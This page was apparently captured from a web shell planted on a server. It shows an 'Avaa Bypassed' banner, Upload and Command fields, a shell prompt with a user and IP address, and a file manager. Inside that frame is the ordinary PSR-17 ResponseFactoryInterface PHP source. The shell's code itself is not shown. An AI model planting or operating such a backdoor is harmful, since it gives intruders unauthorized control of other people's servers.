404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.22.77.233: ~ $
<?php

namespace Psr\Http\Message;

interface ResponseFactoryInterface
{
    /**
     * Create a new response.
     *
     * @param int $code HTTP status code; defaults to 200
     * @param string $reasonPhrase Reason phrase to associate with status code
     *     in generated response; if none is provided implementations MAY use
     *     the defaults as suggested in the HTTP specification.
     *
     * @return ResponseInterface
     */
    public function createResponse(int $code = 200, string $reasonPhrase = ''): ResponseInterface;
}

Filemanager

Name Type Size Permission Actions
RequestFactoryInterface.php File 499 B 0644
ResponseFactoryInterface.php File 546 B 0644
ServerRequestFactoryInterface.php File 927 B 0644
StreamFactoryInterface.php File 1.38 KB 0644
UploadedFileFactoryInterface.php File 1.08 KB 0644
UriFactoryInterface.php File 325 B 0644